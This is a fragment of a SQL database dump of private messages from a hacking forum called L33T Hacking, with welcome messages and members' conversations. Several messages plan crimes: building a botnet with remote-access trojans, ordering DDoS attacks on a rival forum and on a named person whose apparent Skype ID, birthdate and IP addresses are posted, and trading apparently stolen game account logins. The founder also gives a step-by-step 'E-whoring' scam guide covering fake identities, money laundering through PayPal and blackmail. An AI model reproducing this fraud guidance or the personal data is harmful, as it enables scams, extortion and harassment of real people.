'1', '0', '1', '0', '2', '1352132054'); INSERT INTO mybb_privatemessages VALUES('4017', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nI know you have a busy schedule but I really need help. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\n\r\ncan this wait 1-2 days? I\'m really busy latetly :/\r\n[/quote]\r\n\r\nyeah sure.\r\n[/quote]\r\n\r\nwhat slogan would you prefer?\r\nI\'m really bad to pick slogans :/', '1352033842', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4018', '320', '320', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"320\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Lordsimo.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352034592', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4019', '1', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Need image for advert', '0', 'no idea if you like it but here it goes\r\n\r\n[img]http://i.imgur.com/lW5fi.gif[/img]\r\n\r\nI can add a slogan animated aswell and then Join us now or something, I just don\'t know what text shall I add. out of ideas here.\r\n\r\nand btw you like the background?', '1352034908', '0', '3', '1352180618', '1', '0', '2', '1352132058'); INSERT INTO mybb_privatemessages VALUES('4020', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', 'no idea if you like it but here it goes\r\n\r\n[img]http://i.imgur.com/lW5fi.gif[/img]\r\n\r\nI can add a slogan animated aswell and then Join us now or something, I just don\'t know what text shall I add. out of ideas here.\r\n\r\nand btw you like the background?', '1352034908', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4021', '321', '321', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"321\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum tmac30.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352125410', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4022', '323', '323', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"323\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum moruzaks.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352160956', '0', '1', '0', '0', '0', '0', '1352170231'); INSERT INTO mybb_privatemessages VALUES('4023', '324', '324', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"324\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Purps™.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352172281', '0', '1', '0', '0', '0', '0', '1352172287'); INSERT INTO mybb_privatemessages VALUES('4024', '325', '325', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"325\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Perfection.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352177179', '0', '1', '0', '0', '0', '0', '1352177183'); INSERT INTO mybb_privatemessages VALUES('4025', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Need image for advert', '0', '[quote=\'R?????zo?\']\r\nno idea if you like it but here it goes\r\n\r\n[img]http://i.imgur.com/lW5fi.gif[/img]\r\n\r\nI can add a slogan animated aswell and then Join us now or something, I just don\'t know what text shall I add. out of ideas here.\r\n\r\nand btw you like the background?\r\n[/quote]\r\nIt looks awesome. I first saw this when I was in school and when I saw this I said wow and the girl next to me was like that looks sexy.', '1352180618', '0', '3', '1352191790', '1', '0', '0', '1352191535'); INSERT INTO mybb_privatemessages VALUES('4026', '324', '324', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"324\";}}', '1', 'Hi', '0', 'Hi, \r\n\r\nFirstly welcome to L33T Hacking. It\'s great to have you on LH.\r\n\r\nSecondly, I highly appreciate your contribution but L33T Hacking is not a post here and PM me site. If possible can you please change your minecraft accounts from post here and PM me or just post here and use the lock mycode. What the lock mycode does is hides the content til someone posts. Only the poster can then view the content.', '1352181246', '0', '3', '1352181754', '1', '0', '0', '1352181547'); INSERT INTO mybb_privatemessages VALUES('4027', '1', '1', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\nHi, \r\n\r\nFirstly welcome to L33T Hacking. It\'s great to have you on LH.\r\n\r\nSecondly, I highly appreciate your contribution but L33T Hacking is not a post here and PM me site. If possible can you please change your minecraft accounts from post here and PM me or just post here and use the lock mycode. What the lock mycode does is hides the content til someone posts. Only the poster can then view the content.\r\n[/quote]\r\n\r\nIt is post here and I will pm you. ', '1352181754', '0', '3', '1352182781', '0', '0', '0', '1352182426'); INSERT INTO mybb_privatemessages VALUES('4028', '324', '1', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\']\r\nHi, \r\n\r\nFirstly welcome to L33T Hacking. It\'s great to have you on LH.\r\n\r\nSecondly, I highly appreciate your contribution but L33T Hacking is not a post here and PM me site. If possible can you please change your minecraft accounts from post here and PM me or just post here and use the lock mycode. What the lock mycode does is hides the content til someone posts. Only the poster can then view the content.\r\n[/quote]\r\n\r\nIt is post here and I will pm you. ', '1352181754', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4029', '324', '324', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"324\";}}', '1', 'Re: Hi', '0', '[quote=\'Purps™\']\r\n[quote=\'t3h jok3r\']\r\nHi, \r\n\r\nFirstly welcome to L33T Hacking. It\'s great to have you on LH.\r\n\r\nSecondly, I highly appreciate your contribution but L33T Hacking is not a post here and PM me site. If possible can you please change your minecraft accounts from post here and PM me or just post here and use the lock mycode. What the lock mycode does is hides the content til someone posts. Only the poster can then view the content.\r\n[/quote]\r\n\r\nIt is post here and I will pm you. \r\n[/quote]\r\n\r\nOh lol sorry I thought it was post here and PM me. It\'s OK if you leave this one as post here and you PM them but in future please try avoiding post here and any kind of PM.\r\n\r\n', '1352182781', '0', '1', '0', '1', '0', '0', '1352185821'); INSERT INTO mybb_privatemessages VALUES('4030', '160', '160', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '1', 'Re: Hey Guys', '0', '[quote=\'Jacob\']\r\n[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades\r\n[/quote]\r\n\r\nLets use darkcomet i\'m more use to it :D\r\n\r\nWhat version do you have?', '1352186480', '0', '3', '1352220944', '1', '0', '0', '1352220912'); INSERT INTO mybb_privatemessages VALUES('4031', '1', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\']\r\nIt looks awesome. I first saw this when I was in school and when I saw this I said wow and the girl next to me was like that looks sexy.\r\n[/quote]\r\n\r\nglad you like it :)', '1352191790', '0', '1', '0', '1', '0', '2', '1352195155'); INSERT INTO mybb_privatemessages VALUES('4032', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Need image for advert', '0', '[quote=\'t3h jok3r\']\r\nIt looks awesome. I first saw this when I was in school and when I saw this I said wow and the girl next to me was like that looks sexy.\r\n[/quote]\r\n\r\nglad you like it :)', '1352191790', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4033', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Hustle', '0', 'I found out about a new TV show called the real hustle I found it educational as it\'s also about social engineering and scamming.\r\n\r\nYou should watch it.', '1352196258', '0', '1', '0', '1', '0', '0', '1352206581'); INSERT INTO mybb_privatemessages VALUES('4034', '5', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'Re: Hey Guys', '0', '[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\n[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades\r\n[/quote]\r\n\r\nLets use darkcomet i\'m more use to it :D\r\n\r\nWhat version do you have?\r\n[/quote]\r\n\r\nLatest lol?\r\nThe shit I can download from L33t Hacking\r\n\r\nCan you add me on skype?\r\n\r\nJ.acob.C', '1352220944', '0', '3', '1352256678', '1', '0', '0', '1352256640'); INSERT INTO mybb_privatemessages VALUES('4035', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Hey Guys', '0', '[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\n[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades\r\n[/quote]\r\n\r\nLets use darkcomet i\'m more use to it :D\r\n\r\nWhat version do you have?\r\n[/quote]\r\n\r\nLatest lol?\r\nThe shit I can download from L33t Hacking\r\n\r\nCan you add me on skype?\r\n\r\nJ.acob.C', '1352220944', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4036', '62', '62', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Hey', '0', 'Hey, just asking, do you have any good DDosers that work?\r\n\r\nJays booter is a piece of shit, doesnt do anything.\r\n\r\n', '1352228566', '0', '1', '0', '1', '0', '0', '1352233863'); INSERT INTO mybb_privatemessages VALUES('4037', '160', '62', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hey', '0', 'Hey, just asking, do you have any good DDosers that work?\r\n\r\nJays booter is a piece of shit, doesnt do anything.\r\n\r\n', '1352228566', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4055', '332', '332', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"332\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Regac Kebabistan.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352412706', '0', '1', '0', '0', '0', '0', '1352412773'); INSERT INTO mybb_privatemessages VALUES('4040', '327', '327', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"327\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum dublejayj.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352245945', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4041', '160', '160', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '1', 'Re: Hey Guys', '0', '[quote=\'Jacob\']\r\n[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\n[quote=\'Timmy\']\r\n[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?\r\n[/quote]\r\n\r\nAny, \r\n\r\nDarkComet Or Black shades\r\n[/quote]\r\n\r\nLets use darkcomet i\'m more use to it :D\r\n\r\nWhat version do you have?\r\n[/quote]\r\n\r\nLatest lol?\r\nThe shit I can download from L33t Hacking\r\n\r\nCan you add me on skype?\r\n\r\nJ.acob.C\r\n[/quote]\r\nSorry but I don\'t have Skype. Can you give me the link to the download thread?', '1352256678', '0', '1', '0', '1', '0', '0', '1352326739'); INSERT INTO mybb_privatemessages VALUES('4054', '331', '331', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"331\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum allaine99.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352408618', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4043', '82', '82', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'mc', '0', 'jackbraun312:jeffie\r\n\r\nPROOF: http://puu.sh/1nmDO\r\n\r\nIf you want to vouch go ahead, it doesn\'t matter. :p', '1352262914', '0', '1', '0', '0', '0', '0', '1352289991'); INSERT INTO mybb_privatemessages VALUES('4044', '324', '82', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'mc', '0', 'jackbraun312:jeffie\r\n\r\nPROOF: http://puu.sh/1nmDO\r\n\r\nIf you want to vouch go ahead, it doesn\'t matter. :p', '1352262914', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4045', '228', '228', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'MC', '0', 'thesamlkay123:samlkay567\r\n\r\nProof : http://puu.sh/1nmHS', '1352263065', '0', '1', '0', '0', '0', '0', '1352315253'); INSERT INTO mybb_privatemessages VALUES('4046', '324', '228', '324', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'MC', '0', 'thesamlkay123:samlkay567\r\n\r\nProof : http://puu.sh/1nmHS', '1352263065', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4053', '330', '330', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"330\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Dage.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352373311', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4052', '329', '329', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"329\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Weeknd.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352371121', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4049', '1', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: DDoS service', '0', '[quote=\'t3h jok3r\']\r\nI need you to hit anarchyforums on their cloudflare IP. Doesn\'t matter how long but at least 4 mins would be highly appreciated. Do it anytime when you are free.\r\n[/quote]\r\n\r\nfuck so sorry i didnt see this sooner, I\'m hitting it now.', '1352342101', '0', '1', '0', '1', '0', '2', '1352349455'); INSERT INTO mybb_privatemessages VALUES('4050', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS service', '0', '[quote=\'t3h jok3r\']\r\nI need you to hit anarchyforums on their cloudflare IP. Doesn\'t matter how long but at least 4 mins would be highly appreciated. Do it anytime when you are free.\r\n[/quote]\r\n\r\nfuck so sorry i didnt see this sooner, I\'m hitting it now.', '1352342101', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4057', '335', '335', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"335\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum loser386.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352449517', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4058', '1', '1', '323', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Hello', '0', 'i am very happy to be a member of this hacking site and i never regret to be a member. as i look forward to contribute educationally in the nearest future. \r\n\r\ni love all the hard work you\'ve been adding to the forum and God will keep providing you with an uncomparable knowledge. but please i would ask you of a favor. i really want to go into Ewhoring, but i have been having problems with pics and vids. i would be very grateful if you can help me out with it. \r\n\r\nhope to hear from you.\r\nthanks.', '1352478495', '0', '3', '1352479365', '0', '1', '0', '1352478879'); INSERT INTO mybb_privatemessages VALUES('4059', '323', '1', '323', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hello', '0', 'i am very happy to be a member of this hacking site and i never regret to be a member. as i look forward to contribute educationally in the nearest future. \r\n\r\ni love all the hard work you\'ve been adding to the forum and God will keep providing you with an uncomparable knowledge. but please i would ask you of a favor. i really want to go into Ewhoring, but i have been having problems with pics and vids. i would be very grateful if you can help me out with it. \r\n\r\nhope to hear from you.\r\nthanks.', '1352478495', '0', '1', '0', '0', '1', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4060', '323', '323', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"323\";}}', '1', 'Re: Hello', '0', '[quote=\'moruzaks\']\r\ni am very happy to be a member of this hacking site and i never regret to be a member. as i look forward to contribute educationally in the nearest future. \r\n\r\ni love all the hard work you\'ve been adding to the forum and God will keep providing you with an uncomparable knowledge. but please i would ask you of a favor. i really want to go into Ewhoring, but i have been having problems with pics and vids. i would be very grateful if you can help me out with it. \r\n\r\nhope to hear from you.\r\nthanks.\r\n[/quote]\r\n\r\nThanks and sure.\r\n\r\nE-Whoring is a Social Engineering technique in which you [i] pretend[/i] to be a girl and convince your pedo through chats.\r\n\r\nAll chatrooms are not saturated but I would recommend you to find your own private chatroom which no other E-Whore is not aware of. You can find some good packs at darkjb.com.\r\n\r\nAll you have to do is be a bit formal, use a lot of punctuation, use some smilies and dirty talk.\r\n\r\nYou would need to create a fake email. I would recommend finding a fake female address from fakenamegenerator and saving it.\r\n\r\nCreate a fake Canadian PayPal because Canadian PayPals don\'t need to be verified.\r\n\r\nAs soon as you get your money, send the money to your real PayPal so if they charge back they don\'t get a single penny. If you want blackmail then PM Timmy as he is a good blackmailer and has been a Social Engineer for 2 years.\r\n\r\nIf you will be using videos which is more useful and earn more money then you need to download manycam. \r\n\r\nFor more information check out this thread.\r\nhttp://l33thacking.net/thread-26.html\r\n\r\nGood Luck!\r\n\r\nUse this PM upon your choice. This should not be considered an advice but an educational lesson.', '1352479365', '0', '0', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4061', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Junk', '0', 'Hey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.', '1352493090', '0', '3', '1352493834', '1', '0', '0', '1352493662'); INSERT INTO mybb_privatemessages VALUES('4062', '1', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Junk', '0', '[quote=\'t3h jok3r\']\r\nHey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.\r\n[/quote]\r\nI didn\'t mean to. I was on mobile I have to fix it asap. My phone derps out sometimes and just goes nuts. I dropped it and the touch screen is messed.', '1352493731', '0', '3', '1352496690', '1', '0', '2', '1352496659'); INSERT INTO mybb_privatemessages VALUES('4063', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Junk', '0', '[quote=\'t3h jok3r\']\r\nHey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.\r\n[/quote]\r\nI didn\'t mean to. I was on mobile I have to fix it asap. My phone derps out sometimes and just goes nuts. I dropped it and the touch screen is messed.', '1352493731', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4064', '1', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Junk', '0', '[quote=\'t3h jok3r\']\r\nHey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.\r\n[/quote]\r\nFixed.', '1352493834', '0', '1', '0', '1', '0', '2', '1352496643'); INSERT INTO mybb_privatemessages VALUES('4065', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Junk', '0', '[quote=\'t3h jok3r\']\r\nHey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.\r\n[/quote]\r\nFixed.', '1352493834', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4066', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Junk', '0', '[quote=\'NXK\']\r\n[quote=\'t3h jok3r\']\r\nHey,\r\n\r\nI noticed you junked this thread.\r\n\r\nhttp://l33thacking.net/thread-1232.html\r\n\r\nI scanned it on virustotal and used sandboxie on it and it seems legit.\r\n[/quote]\r\nI didn\'t mean to. I was on mobile I have to fix it asap. My phone derps out sometimes and just goes nuts. I dropped it and the touch screen is messed.\r\n[/quote]\r\n\r\nI can understand how hard it is on the phone.', '1352496690', '0', '1', '0', '1', '0', '0', '1352496986'); INSERT INTO mybb_privatemessages VALUES('4067', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'DDoS', '0', 'Skype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D', '1352497178', '0', '3', '1352515574', '1', '0', '2', '1352515388'); INSERT INTO mybb_privatemessages VALUES('4068', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'DDoS', '0', 'Skype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D', '1352497178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4069', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'DDoS #2', '0', 'Another possible IP of his:\r\n99.228.45.133\r\nISP:\r\nCPEbcc8100a5a85-CMbcc8100a5a82.cpe.net.cable.rogers.com\r\n\r\n', '1352497534', '0', '1', '0', '1', '0', '2', '1352515377'); INSERT INTO mybb_privatemessages VALUES('4070', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'DDoS #2', '0', 'Another possible IP of his:\r\n99.228.45.133\r\nISP:\r\nCPEbcc8100a5a85-CMbcc8100a5a82.cpe.net.cable.rogers.com\r\n\r\n', '1352497534', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4071', '338', '338', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"338\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum TauAssassin.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352504128', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4072', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: DDoS', '0', '[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.', '1352515574', '0', '3', '1352517932', '1', '0', '0', '1352517892'); INSERT INTO mybb_privatemessages VALUES('4073', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. ', '1352517932', '0', '3', '1352519466', '1', '0', '2', '1352519434'); INSERT INTO mybb_privatemessages VALUES('4074', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. ', '1352517932', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4075', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: DDoS', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. 